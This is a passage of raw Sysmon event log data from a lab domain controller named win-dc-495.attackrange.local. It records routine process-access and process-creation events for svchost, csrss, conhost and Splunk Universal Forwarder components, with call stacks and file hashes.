SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:47.266{59A5CD1D-910B-6005-7201-00000000A301}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.735{59A5CD1D-910C-6005-7401-00000000A301}28244532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.594{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.596{59A5CD1D-910C-6005-7401-00000000A301}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.219{59A5CD1D-910C-6005-7301-00000000A301}22323048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 